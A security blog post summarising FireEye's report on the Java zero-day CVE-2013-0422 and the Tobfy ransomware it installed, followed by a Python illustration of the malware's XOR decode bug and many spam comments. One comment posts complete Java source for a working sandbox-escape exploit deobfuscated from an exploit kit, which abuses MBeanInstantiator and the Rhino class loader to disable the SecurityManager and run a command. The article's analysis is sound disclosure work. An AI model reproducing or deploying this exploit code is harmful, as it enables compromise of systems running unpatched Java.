New Zero-Day Java Exploit

Julia Wolf, Darien Kindlund, and James Bennett of FireEye, in their post Happy New Year from New Java Zero-Day, report that a Java security-bypass zero-day vulnerability (CVE-2013-0422) has been actively exploited in the wild since Jan. 2. They were able to reproduce the attack in-house with the latest Java 7 release at the time (Java 7 Update 10) on Windows.

Some of the initial landing pages are hosted on a popular file-sharing website; they eventually redirect to several different domains hosting the exploits and malware.

The exploit uses the vulnerability to escape the Java sandbox, then downloads an executable file from a remote server and runs it. The dropped malware is Windows-only, but the vulnerability itself is not: it can be exploited across different browsers and OS platforms.

The malware payload is ransomware, commonly known as Tobfy. It retrieves a template from the Web, in this case hxxp://<random>.cristmastea.info/get.php, and uses it to create a full-screen window demanding payment, relying on a social-engineering scheme to scare the victim. It also disables Windows Safe Mode by deleting the values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot, and it terminates processes such as "taskmgr.exe," "msconfig.exe," "regedit.exe," and "cmd.exe" to deter the victim from trying to find or disable the malware. Strings such as \\xneo\\lock\\Release\\lock.pdb and "Conteneur ActiveX" were found in memory and helped make identification easier.

One more noteworthy finding is that the URLs used to download the template and make callbacks are stored XOR-encoded and must be decoded before use. However, it appears the author forgot to call the decode function in the callback thread, so the malware is unable to communicate with the attacker. It is supposed to make an HTTP request for hxxp://<random>.my-files-download.ru/status.php, but instead requests the invalid URL hxxp://<random>.my-files-download.ru/.ru`utr/qiq, i.e. the still-encoded path. What makes this error even worse for victims is that this callback thread is what determines whether the victim has paid the fee, and it is responsible for removing the ransomware from the system. It seems even paying up will do no good in this case!
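The decode bug is easy to reproduce. The Python below is an added illustration, not code from the FireEye post or from the Tobfy sample. It models the scheme the post describes: URL paths stored XOR-encoded, decoded before use, with one code path that skips the decode. The post does not give the XOR key; XORing the intended path /status.php against the malformed path .ru`utr/qiq quoted above gives the same byte, 0x01, in every position, so the example uses that inferred key and labels it an assumption. It also assumes that the HTTP client prepends a "/" to a path that lacks one, which is what would turn the encoded bytes into the /.ru`utr/qiq shown in the post; how the sample actually joins host and path is not described. The host name is the post's placeholder, and the post's hxxp:// defanging is written as http:// here.

```python
# Added example: models the XOR string obfuscation and the missing decode
# call described above. Not code from the FireEye post or from the sample.
from typing import Optional

# Constructed from the two paths quoted in the post: the intended callback
# path and the malformed path that was requested instead.
INTENDED_PATH = b"/status.php"
MALFORMED_PATH = b".ru`utr/qiq"

# ASSUMPTION: the post does not state the key; 0x01 is what the pair above
# yields (see recover_single_byte_key below).
KEY = 0x01


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR. Encoding and decoding are the same operation."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(plaintext: bytes, ciphertext: bytes) -> Optional[int]:
    """Return the one byte k with plaintext[i] ^ k == ciphertext[i] for all i,
    or None if the lengths differ or no single key explains every byte.
    This is the analyst's sanity check before assuming a trivial scheme."""
    if len(plaintext) != len(ciphertext) or not plaintext:
        return None
    keys = {p ^ c for p, c in zip(plaintext, ciphertext)}
    return keys.pop() if len(keys) == 1 else None


# Constructed: a string table in the style the post describes, one entry per
# URL path the sample needs. Only the callback entry is quoted in the post.
ENCODED_STRINGS = {
    "template": xor_bytes(b"/get.php", KEY),
    "callback": xor_bytes(INTENDED_PATH, KEY),
}


def build_request_url(host: str, path: bytes) -> str:
    """Join host and path the way a typical HTTP client would.
    ASSUMPTION: a path without a leading '/' gets one prepended, which is
    what turns the still-encoded '.ru`utr/qiq' into the '/.ru`utr/qiq'
    the post shows being requested."""
    text = path.decode("latin-1")
    if not text.startswith("/"):
        text = "/" + text
    return "http://" + host + text


def callback_url_correct(host: str) -> str:
    """What the callback thread should do: decode first, then request."""
    return build_request_url(host, xor_bytes(ENCODED_STRINGS["callback"], KEY))


def callback_url_as_shipped(host: str) -> str:
    """The bug the post describes: the decode call is missing, so the
    XOR-encoded bytes go straight into the URL."""
    return build_request_url(host, ENCODED_STRINGS["callback"])


if __name__ == "__main__":
    host = "<random>.my-files-download.ru"   # placeholder host from the post
    print("recovered key: 0x%02x" % recover_single_byte_key(INTENDED_PATH, MALFORMED_PATH))
    print("intended:", callback_url_correct(host))
    print("actual:  ", callback_url_as_shipped(host))
```

recover_single_byte_key returns None when the two strings are of different length or when no single byte explains every position, so a false positive on a multi-byte or non-XOR scheme is rejected rather than silently producing a wrong key.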


74 Responses to “New Zero-Day Java Exploit”

  1. Aw, this was a very nice post. Finding the time and actual effort to generate a superb
    article… but what can I say… I hesitate a whole lot and don’t seem to get anything done.

  2. I just could not depart your site prior to suggesting
    that I extremely loved the usual info an individual provide for your guests?
    Is gonna be again continuously in order to investigate cross-check new
    posts

  3. It is in point of fact a nice and useful piece of info.
    I’m happy that you shared this useful information with us. Please stay us informed like this. Thank you for sharing.

  4. Hello there! Do you use Twitter? I’d like to follow you if that would be okay. I’m absolutely enjoying your blog
    and look forward to new updates.

  5. Your style is so unique compared to other people I have read
    stuff from. Thanks for posting when you’ve got the opportunity, Guess I’ll just book mark this page.

  6. It’s actually a nice and useful piece of information. I am glad that you just shared this helpful information with us. Please keep us up to date like this. Thank you for sharing.

  7. Woah this weblog is wonderful i really like studying your articles. Stay up the great work! You already know, a lot of people are looking round for this info, you could help them greatly.

  8. What’s up Dear, are you in fact visiting this web site regularly, if so then you will definitely get pleasant knowledge.

  9. Wow, this piece of writing is nice, my younger sister is analyzing these kinds of things, thus I am going to convey her.

  10. For the reason that the admin of this web site is working, no
    question very shortly it will be well-known, due to its quality contents.

  11. Hello, I enjoy reading all of your article.
    I wanted to write a little comment to support you.

  12. Aw, this was an exceptionally good post. Finding the time and actual effort to produce a top notch article… but what can I say… I procrastinate a whole lot and never seem to get nearly anything done.

  13. I really like your blog.. very nice colors & theme.
    Did you create this website yourself or did you hire someone to do it for you?
    Please respond, as I’m looking to create my own blog and would like to find out where you got this from. Many thanks.

  14. I have been exploring for a bit for any high-quality articles
    or blog posts in this sort of house . Exploring in Yahoo I
    at last stumbled upon this site. Studying this info So i am happy to show that I have an incredibly excellent uncanny feeling
    I found out exactly what I needed. I most without a doubt will make certain to do
    not omit this website and give it a glance regularly.

  15. Admiring the hard work you put into your blog and detailed information you provide.
    It’s awesome to come across a blog every once in a while that isn’t the same
    out of date rehashed material. Great read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.

  16. Your method of describing all in this piece of writing is in fact fastidious, all can simply understand it, Thanks a lot.

  17. It’s not my first time paying a visit to this web page; I am visiting this site daily and obtain good information from here all the time.

  18. I am not sure the place you’re getting your information, however great topic. I needs to spend a while finding out much more or working out more. Thanks for great info I used to be on the lookout for this info for my mission.

  19. Hey There. I found your blog using msn. This is
    a very well written article. I’ll make sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.

  20. Nice post. I was checking constantly this blog and I am impressed!
    Very useful information particularly the last part 🙂 I care for such info much.
    I was seeking this certain information for a long time.
    Thank you and best of luck.

  21. I like it when folks get together and share thoughts.
    Great site, keep it up!

  22. Hi there, its pleasant piece of writing about media print, we all be familiar with media is
    a impressive source of information.

  23. You really make it seem so easy together with your presentation however
    I in finding this topic to be actually something which
    I feel I would never understand. It kind of feels too complicated and extremely large for
    me. I’m taking a look forward in your next publish, I’ll attempt to get the grasp of it!

  24. Woah! I’m really loving the template/theme of this site. It’s simple, yet effective.

    A lot of times it’s challenging to get that “perfect balance” between superb usability and visual appeal. I must say that you’ve done an
    amazing job with this. In addition, the blog loads super fast
    for me on Chrome. Excellent Blog!

  25. After looking over a few of the articles on your web site, I seriously like
    your technique of blogging. I book-marked it to my bookmark
    website list and will be checking back soon. Please check out my web site as well and tell me what you think.

  26. Thanks for writing this information on your website.

  27. I don’t know whether it’s just me or if perhaps everybody else encountering problems with your blog.

    It seems like some of the written text in your posts are running
    off the screen. Can someone else please comment and let me
    know if this is happening to them too? This may be an issue with my browser
    because I’ve had this happen before. Kudos

  28. Hey there! This is my first comment here so I just wanted to give a quick shout out
    and tell you I genuinely enjoy reading your posts. Can
    you suggest any other blogs/websites/forums that cover the same subjects?
    Thank you!

  29. Hmm it appears like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I submitted and say, I’m
    thoroughly enjoying your blog. I too am an aspiring blog blogger but I’m still new to everything. Do you have any tips and hints for first-time blog writers? I’d really
    appreciate it.

  30. I needed to thank you for this excellent read!! I definitely loved every bit of it.
    I have got you book-marked to check out new stuff you post…

  31. This design is stellar! You definitely know how to keep a reader entertained.
    Between your wit and your videos, I was almost moved to start
    my own blog (well, almost…HaHa!) Wonderful job.
    I really enjoyed what you had to say, and more than that, how you presented it.
    Too cool!

  32. Thank you for the auspicious writeup. It in fact was a leisure account it.
    Look complicated to more brought agreeable from you!

    However, how could we keep up a correspondence?

  33. Incredible points. Outstanding arguments. Keep up the
    good work.

  34. You need to be a part of a contest for one of the greatest blogs online.

    I most certainly will recommend this blog!

  35. Do you mind if I quote a couple of your articles as long as I provide credit and sources back
    to your weblog? My blog site is in the very same
    niche as yours and my users would certainly benefit from a lot of the information you present here.

    Please let me know if this alright with you. Cheers!

  36. Does your website have a contact page? I’m having a tough time locating it but, I’d like to shoot
    you an email. I’ve got some recommendations for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it expand over time.

  37. I love it when people get together and share ideas. Great
    site, keep it up!

  38. I am sure this article has touched all the internet people,
    its really really good piece of writing on building up new website.

  39. Magnificent beat ! I wish to apprentice while you amend your web site, how
    can i subscribe for a blog website? The account helped me
    an acceptable deal. I had been a little bit acquainted with this your broadcast provided bright clear concept

  40. Excellent items from you, man. I’ve taken into account your stuff previous to this and you’re just extremely
    magnificent. I actually like what you have bought here, certainly like what you’re saying and the way wherein you assert it. You are making it entertaining and you still take care of to stay it smart. I can not wait to read far more from you. This is really a wonderful web site.

  41. Hello there! I know this is kinda off topic but I was wondering
    which blog platform are you using for this site? I’m getting sick and tired of WordPress because I’ve had problems with hackers and I’m looking at alternatives for another platform. I would be fantastic if you could point me in the direction of a good platform.

  42. We stumbled over here from a different website and thought I might
    as well check things out. I like what I see so i am just following you.
    Look forward to going over your web page for a second time.

  43. I’m not that much of an internet reader, to be honest, but your blog’s really nice, keep it up!

    I’ll go ahead and bookmark your site to come back later on. All the best

  44. Definitely consider that which you said. Your favorite justification seemed to be on the
    net the easiest thing to take into account of. I say to you,
    I definitely get annoyed even as folks think about
    issues that they just don’t know about. You managed to hit the nail upon the top and defined out the entire thing without having side-effects , people can take a signal. Will probably be back to get more. Thanks

  45. Hi, Neat post. There’s an issue along with your web site in web explorer, may test this? IE nonetheless is the market chief and a huge part of other people will omit your fantastic writing because of this problem.

  46. Do you mind if I quote a few of your posts as long as I provide credit and sources back to your webpage?

    My website is in the very same area of interest as
    yours and my visitors would definitely benefit from a lot of
    the information you present here. Please let me know if this
    alright with you. Regards!

  47. I couldn’t resist commenting. Perfectly written!

  48. Hello! I could have sworn I’ve been to this website before but right after browsing by means of some with the post I realized it is new to me. Nonetheless, I’m surely happy I found it and I’ll be book-marking and checking back often!

  49. This is my first time pay a visit at here and i am truly happy to
    read all at alone place.

  50. You are so interesting! I don’t think I’ve read anything like
    that before. So good to find another person with original
    thoughts on this topic. Seriously.. thank you for starting this
    up. This site is one thing that is required on the internet, someone with a little originality!

  51. Quite informative post. Your current Site style is awesome as nicely!

  52. /*
     * From Paunch with love (Java 1.7.0_11 Exploit)
     *
     * Deobfuscated from Cool EK by SecurityObscurity
     *
     * https://twitter.com/SecObscurity
     */
    import java.applet.Applet;
    import com.sun.jmx.mbeanserver.Introspector;
    import com.sun.jmx.mbeanserver.JmxMBeanServer;
    import com.sun.jmx.mbeanserver.MBeanInstantiator;
    import java.lang.reflect.Method;
    import javax.management.ReflectionException;
    import java.io.*;

    public class PaunchGift extends Applet
    {
        public void init()
        {
            try
            {
                int length;
                byte[] buffer = new byte[5000];
                ByteArrayOutputStream os = new ByteArrayOutputStream();

                // read in the Payload class file bundled in the applet jar
                InputStream is = getClass().getResourceAsStream("Payload.class");

                // and write it out to the byte array stream
                while ((length = is.read(buffer)) > 0)
                    os.write(buffer, 0, length);

                // convert it to a simple byte array
                buffer = os.toByteArray();

                // Step 1: MBeanInstantiator.findClass with a null loader hands back
                // restricted sun.* classes the applet sandbox would normally refuse.
                Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");

                // Step 2: obtain a Rhino GeneratedClassLoader via Context.enter()
                // followed by Context.createClassLoader(null)
                Method method = getMethod(class1, "enter", true);
                Object obj = method.invoke(null, new Object[0]);
                Method method1 = getMethod(class1, "createClassLoader", false);
                Object obj1 = method1.invoke(obj, new Object[1]);

                // Step 3: define Payload with that loader; the resulting class is
                // trusted, so its doPrivileged block can drop the SecurityManager.
                Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
                Method method2 = getMethod(class2, "defineClass", false);

                Class my_class = (Class) method2.invoke(obj1, new Object[] { null, buffer });
                my_class.newInstance();                       // constructor nulls the SecurityManager
                Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
                m_outSandbox.invoke(null, new Object[] {});   // now unrestricted: spawn calc.exe
            }
            catch (Throwable localThrowable) {}
        }

        // Enumerate declared methods through Introspector.elementFromComplex, which
        // invokes the "declaredMethods" getter reflectively from trusted JDK code,
        // so the applet never calls getDeclaredMethods() on a restricted class itself.
        private Method getMethod(Class class1, String s, boolean flag)
        {
            try
            {
                Method[] amethod = (Method[]) Introspector.elementFromComplex(class1, "declaredMethods");

                for (int i = 0; i < amethod.length; i++)
                {
                    Method method = amethod[i];
                    String s1 = method.getName();
                    Class[] aclass = method.getParameterTypes();
                    // flag == true: only accept a zero-argument overload
                    if (s1.equals(s) && (!flag || aclass.length == 0))
                        return method;
                }
            }
            catch (Exception localException) {}

            return null;
        }

        // Load an arbitrary class by name through MBeanInstantiator.findClass with a
        // null ClassLoader, bypassing the package-access check on sun.* packages.
        private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
        {
            Object obj = null;   // null loader: resolve through the bootstrap loader
            JmxMBeanServer jmxmbeanserver = (JmxMBeanServer) JmxMBeanServer.newMBeanServer("", null, null, true);
            MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

            Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
            Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
            return (Class) method.invoke(mbeaninstantiator, new Object[] { s, obj });
        }
    }

    ###############################################
    // Payload.class, bundled alongside PaunchGift in the applet jar
    import java.lang.reflect.Method;
    import java.security.AccessController;
    import java.security.PrivilegedExceptionAction;

    public class Payload implements PrivilegedExceptionAction
    {
        public Payload()
        {
            try
            {
                // runs with the privileges of the trusted, Rhino-defined class
                AccessController.doPrivileged(this);
            }
            catch (Exception exception) {}
        }

        public Object run() throws Exception
        {
            // System.setSecurityManager(null): removes the applet sandbox entirely
            Class cl = System.class;
            Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
            m.invoke(null, new Object[1]);
            return null;
        }

        public static void outSandbox() throws Exception
        {
            Runtime.getRuntime().exec("calc.exe");
        }
    }

  53. Wonderful blog! I found it while browsing on Yahoo News. Do you have any suggestions on how
    to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Appreciate it

  54. Just desire to say your article is as astounding. The clearness in your post is just great and i could
    assume you’re an expert on this subject. Fine with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please keep up the enjoyable work.

  55. Wow that was odd. I just wrote an really long comment but after I clicked
    submit my comment didn’t appear. Grrrr… well I’m not writing all that over again.
    Anyways, just wanted to say fantastic blog!

  56. Good way of describing, and nice paragraph to take facts about my presentation subject matter, which i am going to present in institution
    of higher education.

  57. I delight in, lead to I found exactly what I was looking for.
    You’ve ended my 4 day lengthy hunt! God Bless you man. Have a great day. Bye

  58. There’s definitely a great deal to learn about this issue. I love all of the points you have made.

  59. Thanks for the auspicious writeup. It if truth be told was a enjoyment
    account it. Glance advanced to far brought agreeable from you!
    By the way, how can we communicate?

  60. For most up-to-date news you have to go to see world-wide-web and on the web I found
    this web page as a most excellent web page for newest updates.

  61. Hey There. I found your weblog the usage of msn.
    That is a very smartly written article. I will be sure to bookmark it and return to learn more of your helpful info.

    Thank you for the post. I’ll certainly return.

  62. It’s remarkable in support of me to have a web page, which is good designed for my know-how. thanks admin

  63. I simply want to tell you that I am newbie to blogging and site-building and absolutely liked you’re web blog. Likely I’m going to bookmark your blog post . You absolutely have good article content. Many thanks for sharing with us your website.

  64. Yes! Finally someone writes about acme brick.

  65. I think this is among the most vital info for me.

    And i am glad reading your article. But should remark on
    few general things, The web site style is wonderful, the articles is really great
    : D. Good job, cheers

  66. Appreciate this post. Will try it out.

  67. Howdy! I simply wish to give you a big thumbs up for your
    excellent information you’ve got here on this post. I will be returning to your site for more soon.

  68. this might seem kinda creepy but i really like the way you speak. anyways, great video! i look forward to more of these videos 🙂

  69. Great video, Fun and succinctly explained.. Will use it an introduction when I am giving talks to genealogists and historians on blogging
